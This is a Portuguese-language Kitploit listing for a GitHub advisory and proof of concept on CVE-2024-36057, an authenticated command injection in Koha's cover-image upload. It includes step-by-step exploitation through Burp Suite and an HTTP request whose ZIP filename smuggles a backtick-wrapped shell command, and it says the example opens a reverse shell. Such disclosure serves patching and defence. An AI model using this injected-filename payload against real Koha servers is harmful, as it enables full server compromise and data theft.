Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/hacklantic/cve-2024-36057
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubhacklantic/cve-2024-36057

CVE-2024-36057

Advisory e prova de conceito para CVE-2024-36057, uma injeção de comandos do sistema operacional autenticada no Koha Library Software, demonstrando execução arbitrária de comandos por meio de nomes de arquivos ZIP manipulados.

Ver Repositório
5há 20 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-36057 — Koha Library Software < 22.05.22 — Injeção de Comandos do SO

ID CVE: CVE-2024-36057
Produto: Koha Library Software
Tipo de Vulnerabilidade: Injeção de Comandos do SO (CWE-78)
Pontuação CVSS: 8.7 (Alta) Autenticado
Versões Afetadas: Abaixo de 22.05.22
Créditos: Karolis Narvilas


Descrição

O Koha é um sistema integrado de bibliotecas de código aberto. Existe uma vulnerabilidade de injeção de comandos na funcionalidade de upload de imagens de capa em tools/upload-cover-image.pl. A aplicação usa qx/unzip $filename -d $dirname/ para extrair arquivos ZIP enviados sem sanitizar o parâmetro do nome do arquivo.

Um usuário autenticado com privilégios elevados pode criar um arquivo ZIP com um nome de arquivo malicioso contendo caracteres de crase para injetar comandos arbitrários do shell, que são executados no servidor quando o usuário clica em "Process Images".

Impacto: Um atacante remoto autenticado pode explorar a CVE-2024-36057 para executar comandos arbitrários do SO no servidor subjacente, levando ao comprometimento total do sistema, exfiltração de dados e ao estabelecimento de backdoors persistentes ou shells reversos.


Prova de Conceito (PoC)

  1. Faça login no Koha como um usuário com privilégios elevados.
  2. Navegue até: https://{domain}/cgi-bin/koha/tools/upload-cover-image.pl
  3. Envie um arquivo ZIP normal e, usando um proxy de interceptação como o Burp Suite, edite o nome do arquivo conforme mostrado abaixo:

Requisição:

root@kitploit:~
POST /cgi-bin/koha/tools/upload-file.pl?temp=1 HTTP/1.1
Host: {domain}
Cookie: [Sessão de Privilégios Elevados]
Connection: close

------WebKitFormBoundaryP82Da5V6eaQOuBUT
Content-Disposition: form-data; name="file"; filename="execute`<COMANDO_INJETADO>`.zip"
Content-Type: application/x-zip-compressed

<conteúdo do arquivo zip>
------WebKitFormBoundaryP82Da5V6eaQOuBUT--

  1. Após o arquivo ZIP ser enviado com sucesso, clique em "Process Images".
  2. O comando injetado dentro das crases é executado no servidor. Neste exemplo, um shell reverso é estabelecido na máquina alvo.

Prova de Conceito do Shell Reverso


Referências

  • Comunidade Koha - Notas de Lançamento para v22.05.22
  • MITRE - CVE-2024-36057
  • Hacklantic
Baixar ferramenta